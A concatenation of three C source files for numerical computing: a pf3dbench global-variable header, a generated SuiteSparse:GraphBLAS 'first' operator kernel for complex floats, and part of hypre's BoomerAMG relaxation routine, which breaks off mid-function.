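/* Example of the EXTERN trick (hypothetical allocating file):
 *
 *   #define __parm_init__
 *   #include "pf3dbenchvars.h"  // EXTERN expands to nothing: storage lives here
 *
 * Every other file includes this header without the define and sees
 * plain extern declarations. */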
#ifndef _PF3DBENCHVARS_H_
#define _PF3DBENCHVARS_H_
#ifdef OMP45
#pragma omp declare target
#endif
EXTERN int ngrd; /* number of guard cells */
EXTERN int nxa, nya, nza; /* allocated box dimensions */
EXTERN int omp_maxthreads;
EXTERN long ngtot, nplng, nmaxpln, ntheta;
/* xy arrays */
EXTERN real *theta; /* rotation angles */
/* 3D arrays */
EXTERN rcomplex *tN_new; /* temp storage for a new light wave */
EXTERN real *thetb; /* angles as a function of z */
EXTERN real *thetb_sav; /* angles as a function of z backup*/
EXTERN char *cbuf;
#ifdef OMP45
#pragma omp end declare target
#endif
#endif /* _PF3DBENCHVARS_H_ */
|
GB_binop__first_fc32.c |
//------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2022, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_08__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_02__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_04__first_fc32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__first_fc32)
// A*D function (colscale): GB (_AxD__first_fc32)
// D*A function (rowscale): GB (_DxB__first_fc32)
// C+=B function (dense accum): GB (_Cdense_accumB__first_fc32)
// C+=b function (dense accum): GB (_Cdense_accumb__first_fc32)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__first_fc32)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: GxB_FC32_t
// A type: GxB_FC32_t
// A pattern? 0
// B type: GxB_FC32_t
// B pattern? 1
// BinaryOp: cij = aij
#define GB_ATYPE \
GxB_FC32_t
#define GB_BTYPE \
GxB_FC32_t
#define GB_CTYPE \
GxB_FC32_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
GxB_FC32_t aij = GBX (Ax, pA, A_iso)
// true if values of A are not used
#define GB_A_IS_PATTERN \
0
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
;
// true if values of B are not used
#define GB_B_IS_PATTERN \
1
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
GxB_FC32_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = x ;
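// e.g. GB_BINOP (GB_CX (p), aij, bij, i, j) expands to: Cx [p] = aij ;
// (the "first" operator ignores its second operand entirely)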
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_FIRST || GxB_NO_FC32 || GxB_NO_FIRST_FC32)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
void GB (_Cdense_ewise3_noaccum__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_noaccum_template.c"
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
#include "GB_dense_subassign_23_template.c"
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__first_fc32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
// get the scalar b for C += b, of type GxB_FC32_t
GxB_FC32_t bwork = (*((GxB_FC32_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix D,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t *restrict Cx = (GxB_FC32_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix D,
const GrB_Matrix B,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t *restrict Cx = (GxB_FC32_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__first_fc32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool is_eWiseUnion,
const GB_void *alpha_scalar_in,
const GB_void *beta_scalar_in,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
GxB_FC32_t alpha_scalar ;
GxB_FC32_t beta_scalar ;
if (is_eWiseUnion)
{
alpha_scalar = (*((GxB_FC32_t *) alpha_scalar_in)) ;
beta_scalar = (*((GxB_FC32_t *) beta_scalar_in )) ;
}
#include "GB_add_template.c"
GB_FREE_WORKSPACE ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__first_fc32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__first_fc32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__first_fc32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t *Cx = (GxB_FC32_t *) Cx_output ;
GxB_FC32_t x = (*((GxB_FC32_t *) x_input)) ;
GxB_FC32_t *Bx = (GxB_FC32_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
; ;
Cx [p] = x ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
GxB_FC32_t *Cx = (GxB_FC32_t *) Cx_output ;
GxB_FC32_t *Ax = (GxB_FC32_t *) Ax_input ;
GxB_FC32_t y = (*((GxB_FC32_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
GxB_FC32_t aij = GBX (Ax, p, false) ;
Cx [p] = aij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = x ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC32_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t x = (*((const GxB_FC32_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC32_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
GxB_FC32_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t y = (*((const GxB_FC32_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
par_relax.c | /******************************************************************************
* Copyright 1998-2019 Lawrence Livermore National Security, LLC and other
* HYPRE Project Developers. See the top-level COPYRIGHT file for details.
*
* SPDX-License-Identifier: (Apache-2.0 OR MIT)
******************************************************************************/
/******************************************************************************
*
* Relaxation scheme
*
*****************************************************************************/
#include "_hypre_parcsr_ls.h"
#include "Common.h"
#include "_hypre_lapack.h"
#include "../sstruct_ls/gselim.h"
/*--------------------------------------------------------------------------
* hypre_BoomerAMGRelax
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_BoomerAMGRelax( hypre_ParCSRMatrix *A,
hypre_ParVector *f,
HYPRE_Int *cf_marker,
HYPRE_Int relax_type,
HYPRE_Int relax_points,
HYPRE_Real relax_weight,
HYPRE_Real omega,
HYPRE_Real *l1_norms,
hypre_ParVector *u,
hypre_ParVector *Vtemp,
hypre_ParVector *Ztemp )
{
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
hypre_ParCSRCommHandle *comm_handle;
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(A);
HYPRE_Int n = hypre_CSRMatrixNumRows(A_diag);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_BigInt first_ind = hypre_ParVectorFirstIndex(u);
hypre_Vector *u_local = hypre_ParVectorLocalVector(u);
HYPRE_Real *u_data = hypre_VectorData(u_local);
hypre_Vector *f_local = hypre_ParVectorLocalVector(f);
HYPRE_Real *f_data = hypre_VectorData(f_local);
hypre_Vector *Vtemp_local;
HYPRE_Real *Vtemp_data;
if (relax_type != 10)
{
Vtemp_local = hypre_ParVectorLocalVector(Vtemp);
Vtemp_data = hypre_VectorData(Vtemp_local);
}
HYPRE_Real *Vext_data = NULL;
HYPRE_Real *v_buf_data = NULL;
HYPRE_Real *tmp_data;
hypre_Vector *Ztemp_local;
HYPRE_Real *Ztemp_data;
hypre_CSRMatrix *A_CSR;
HYPRE_Int *A_CSR_i;
HYPRE_Int *A_CSR_j;
HYPRE_Real *A_CSR_data;
hypre_Vector *f_vector;
HYPRE_Real *f_vector_data;
HYPRE_Int i, j, jr;
HYPRE_Int ii, jj;
HYPRE_Int ns, ne, size, rest;
HYPRE_Int column;
HYPRE_Int relax_error = 0;
HYPRE_Int num_sends;
HYPRE_Int num_recvs;
HYPRE_Int index, start;
HYPRE_Int num_procs, num_threads, my_id, ip, p;
HYPRE_Int vec_start, vec_len;
hypre_MPI_Status *status;
hypre_MPI_Request *requests;
HYPRE_Real *A_mat;
HYPRE_Real *b_vec;
HYPRE_Real zero = 0.0;
HYPRE_Real res, res0, res2;
HYPRE_Real one_minus_weight;
HYPRE_Real one_minus_omega;
HYPRE_Real prod;
one_minus_weight = 1.0 - relax_weight;
one_minus_omega = 1.0 - omega;
hypre_MPI_Comm_size(comm,&num_procs);
hypre_MPI_Comm_rank(comm,&my_id);
num_threads = hypre_NumThreads();
/*-----------------------------------------------------------------------
* Switch statement to direct control based on relax_type:
* relax_type = 0 -> Jacobi or CF-Jacobi
* relax_type = 1 -> Gauss-Seidel <--- very slow, sequential
* relax_type = 2 -> Gauss-Seidel: interior points in parallel,
* boundary sequential
* relax_type = 3 -> hybrid: SOR-J mix off-processor, SOR on-processor
* with outer relaxation parameters (forward solve)
* relax_type = 4 -> hybrid: SOR-J mix off-processor, SOR on-processor
* with outer relaxation parameters (backward solve)
* relax_type = 5 -> hybrid: GS-J mix off-processor, chaotic GS on-node
* relax_type = 6 -> hybrid: SSOR-J mix off-processor, SSOR on-processor
* with outer relaxation parameters
* relax_type = 7 -> Jacobi (uses Matvec), only needed in CGNR
* relax_type = 8 -> hybrid L1 Symm. Gauss-Seidel
* relax_type = 10 -> On-processor direct forward solve for matrices with
* triangular structure (indices need not be ordered
* triangular)
* relax_type = 13 -> hybrid L1 Gauss-Seidel forward solve
* relax_type = 14 -> hybrid L1 Gauss-Seidel backward solve
* relax_type = 15 -> CG
* relax_type = 16 -> Scaled Chebyshev
* relax_type = 17 -> FCF-Jacobi
* relax_type = 18 -> L1-Jacobi
* relax_type = 9, 99, 98 -> Direct solve, Gaussian elimination
* relax_type = 19 -> Direct solve (old version)
* relax_type = 29 -> Direct solve: Gaussian elimination with BLAS
* (with pivoting) (old version)
*-----------------------------------------------------------------------*/
switch (relax_type)
{
case 0: /* Weighted Jacobi */
{
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
/* printf("!! Proc %d: n %d, num_sends %d, num_cols_offd %d\n", my_id, n, num_sends, num_cols_offd); */
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
if (num_procs > 1)
{
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
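/* Weighted Jacobi update applied below, with u_old held in Vtemp so
 * every point relaxes from the same iterate:
 *   u[i] = (1-w)*u[i] + w*( f[i] - sum_{j!=i} A[i][j]*u_old[j] ) / A[i][i]
 */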
if (relax_points == 0)
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= one_minus_weight;
u_data[i] += relax_weight * res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= one_minus_weight;
u_data[i] += relax_weight * res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 5: /* Hybrid: Jacobi off-processor,
chaotic Gauss-Seidel on-processor */
{
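         /*-----------------------------------------------------------------
          * "Chaotic" Gauss-Seidel: the threaded loop below reads u_data
          * directly, so an update may see a mix of old and freshly
          * computed neighbor values depending on the thread schedule.
          * Off-processor couplings use the Jacobi-style values received
          * in Vext_data, so only the on-processor part is Gauss-Seidel.
          *-----------------------------------------------------------------*/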
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
            /*-----------------------------------------------------------------
             * Complete the halo exchange so that Vext_data holds the
             * off-processor values of u.
             *-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_points == 0)
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
/* Hybrid: Jacobi off-processor, Gauss-Seidel on-processor (forward loop) */
case 3:
{
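         /*-----------------------------------------------------------------
          * Hybrid forward SOR: each thread sweeps its own contiguous
          * block of rows in increasing order, using fresh values inside
          * the block, the old iterate (Ztemp) for rows owned by other
          * threads, and Jacobi-style values (Vext) for off-processor
          * couplings.
          *-----------------------------------------------------------------*/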
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
#if defined(HYPRE_USING_PERSISTENT_COMM)
// JSP: persistent comm can be similarly used for other smoothers
hypre_ParCSRPersistentCommHandle *persistent_comm_handle;
#endif
if (num_procs > 1)
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] -= hypre_MPI_Wtime();
#endif
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
#if defined(HYPRE_USING_PERSISTENT_COMM)
persistent_comm_handle = hypre_ParCSRCommPkgGetPersistentCommHandle(1, comm_pkg);
v_buf_data = (HYPRE_Real *) hypre_ParCSRCommHandleSendDataBuffer(persistent_comm_handle);
Vext_data = (HYPRE_Real *) hypre_ParCSRCommHandleRecvDataBuffer(persistent_comm_handle);
#else
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
#endif
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
HYPRE_Int begin = hypre_ParCSRCommPkgSendMapStart(comm_pkg, 0);
HYPRE_Int end = hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for HYPRE_SMP_SCHEDULE
#endif
for (i = begin; i < end; i++)
{
v_buf_data[i-begin] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,i)];
}
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] += hypre_MPI_Wtime();
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] -= hypre_MPI_Wtime();
#endif
#if defined(HYPRE_USING_PERSISTENT_COMM)
hypre_ParCSRPersistentCommHandleStart(persistent_comm_handle, HYPRE_MEMORY_HOST, v_buf_data);
#else
comm_handle = hypre_ParCSRCommHandleCreate(1, comm_pkg, v_buf_data, Vext_data);
#endif
            /*-----------------------------------------------------------------
             * Complete the halo exchange so that Vext_data holds the
             * off-processor values of u.
             *-----------------------------------------------------------------*/
#if defined(HYPRE_USING_PERSISTENT_COMM)
hypre_ParCSRPersistentCommHandleWait(persistent_comm_handle, HYPRE_MEMORY_HOST, Vext_data);
#else
hypre_ParCSRCommHandleDestroy(comm_handle);
#endif
comm_handle = NULL;
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] += hypre_MPI_Wtime();
#endif
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] -= hypre_MPI_Wtime();
#endif
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
